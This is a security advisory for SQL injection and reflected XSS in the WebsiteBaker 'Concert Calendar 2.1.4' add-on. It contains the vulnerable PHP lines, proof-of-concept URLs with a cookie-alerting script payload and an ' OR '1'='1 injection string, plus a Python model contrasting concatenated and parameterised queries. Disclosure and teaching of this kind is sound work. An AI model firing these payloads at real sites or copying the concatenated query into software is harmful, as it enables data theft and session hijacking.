SSCHADV2013-001 - Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability
Advisory:          Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability
Advisory ID:       SSCHADV2013-001
Author:            Stefan Schurtz
Affected Software: Successfully tested on Concert Calendar 2.1.4
Vendor URL:
Vendor Status:     fixed
======================
Vulnerability Description
======================
The Websitebaker Add-on 'Concert Calendar 2.1.4' takes the GET parameter 'date' in view.php without any validation or escaping and uses it both inside a MySQL query and in the HTML output. It is therefore prone to SQL injection and reflected cross-site scripting (XSS).
======================
Vuln code
======================
// view.php
// The 'date' GET parameter is taken over as-is, without validation or escaping
if (isset($_GET['date'])) {
    $date = $_GET['date'];
}
...
// SQLi: $date is concatenated straight into the query string
$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // line 184
// XSS: $date is echoed into the page without HTML encoding
echo " ".switch_date($date, $dateview)." "; // line 176
======================
PoC-Exploit
======================
// SQLi (requires magic_quotes_gpc = off)
http://[target]/wb/pages/addon.php?date=[SQLi]
// XSS
http://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script>
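Added example (not part of this advisory and not code from the Concert Calendar add-on): the two sinks listed under "Vuln code" and the PoC payloads above, modelled in Python against an in-memory SQLite table of constructed rows. The table name follows the query quoted in the advisory with an assumed TABLE_PREFIX of "wb_"; MySQL's && is written as AND because SQLite does not accept &&, and switch_date() is left out because the advisory's PoC shows it passes a non-date string through unchanged. The vulnerable query is built by string concatenation exactly as in view.php, the hardened one binds the values as parameters, and the echo is shown once raw and once HTML-escaped.

```python
import html
import sqlite3

# Assumed prefix; WebsiteBaker's real TABLE_PREFIX comes from its config.php.
TABLE_PREFIX = "wb_"

# The payloads from the advisory's PoC section.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "'\"><script>alert(document.cookie)</script>"


def make_db():
    """Constructed sample rows standing in for the add-on's mod_concert_dates table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f"CREATE TABLE {TABLE_PREFIX}mod_concert_dates "
        "(section_id INTEGER, concert_date TEXT, title TEXT)"
    )
    conn.executemany(
        f"INSERT INTO {TABLE_PREFIX}mod_concert_dates VALUES (?, ?, ?)",
        [
            (1, "2013-01-05", "Winter concert"),
            (1, "2013-02-14", "Valentine gig"),
            (2, "2013-01-05", "Concert in another section"),
        ],
    )
    return conn


def query_vulnerable(conn, section_id, date):
    """Mirror of view.php line 184: $date is pasted straight into the SQL text.

    With date = "' OR '1'='1" the WHERE clause becomes
        section_id = '1' AND concert_date = '' OR '1'='1'
    and, because AND binds tighter than OR, every row of the table comes back,
    including rows from other sections.
    """
    sql = (
        f"SELECT * FROM {TABLE_PREFIX}mod_concert_dates "
        f"WHERE section_id = '{section_id}' AND concert_date = '{date}'"
    )
    return conn.execute(sql).fetchall()


def query_safe(conn, section_id, date):
    """Hardened form: the values travel as bound parameters, never as SQL text."""
    sql = (
        f"SELECT * FROM {TABLE_PREFIX}mod_concert_dates "
        "WHERE section_id = ? AND concert_date = ?"
    )
    return conn.execute(sql, (section_id, date)).fetchall()


def render_date_vulnerable(date):
    """Mirror of view.php line 176: the parameter is echoed into HTML as-is."""
    return f" {date} "


def render_date_safe(date):
    """Hardened form: HTML-escape (quotes included) before output."""
    return f" {html.escape(date, quote=True)} "


if __name__ == "__main__":
    db = make_db()
    print("legit date, vulnerable query  :", len(query_vulnerable(db, 1, "2013-01-05")), "row(s)")
    print("SQLi payload, vulnerable query:", len(query_vulnerable(db, 1, SQLI_PAYLOAD)), "row(s)")
    print("SQLi payload, safe query      :", len(query_safe(db, 1, SQLI_PAYLOAD)), "row(s)")
    print("raw echo    :", render_date_vulnerable(XSS_PAYLOAD))
    print("escaped echo:", render_date_safe(XSS_PAYLOAD))
```

The "magic_quotes = off" condition in the PoC refers to PHP's magic_quotes_gpc, which backslash-escaped quotes in request data and so kept this particular payload inside the MySQL string literal; it was deprecated in PHP 5.3, removed in PHP 5.4, and was never a substitute for parameter binding. The mysql_* extension used by the add-on offers no prepared statements, so the equivalent of query_safe() in PHP means moving to mysqli or PDO, and the echo needs htmlspecialchars() regardless of the database fix.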
======================
Solution
======================
Update to the latest version, Concert Calendar 2.2.
======================
Disclosure Timeline
======================
01-Jan-2013 – developer informed
08-Jan-2013 – fixed by developer
======================
Credits
======================
Vulnerabilities found and advisory written by Stefan Schurtz.
======================
References
======================
http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37
http://www.darksecurity.de/advisories/2013/SSCHADV2013-001.txt